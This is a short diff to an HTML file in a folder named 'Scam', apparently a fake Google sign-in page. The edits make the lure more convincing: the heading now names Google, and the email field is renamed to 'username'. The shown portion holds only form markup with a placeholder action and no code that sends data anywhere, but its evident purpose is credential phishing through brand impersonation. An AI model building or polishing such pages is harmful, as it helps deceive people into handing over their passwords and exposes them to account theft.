--- a/.scripts/sc4pk/Scam/assets/google.html
+++ b/.scripts/sc4pk/Scam/assets/google.html
@@ -90,11 +90,11 @@
 <body>
     <div class="login-container">
         <div class="login-form">
-            <h1>Sign in to your account</h1>
+            <h1>Sign in to your Google account</h1>
             <form action="#">
                 <div class="form-group">
-                    <label for="email">Email</label>
-                    <input type="email" id="email" name="email" required>
+                    <label for="username">Email</label>
+                    <input type="email" id="username" name="username" required>
                 </div>
                 <div class="form-group">
                     <label for="password">Password</label>
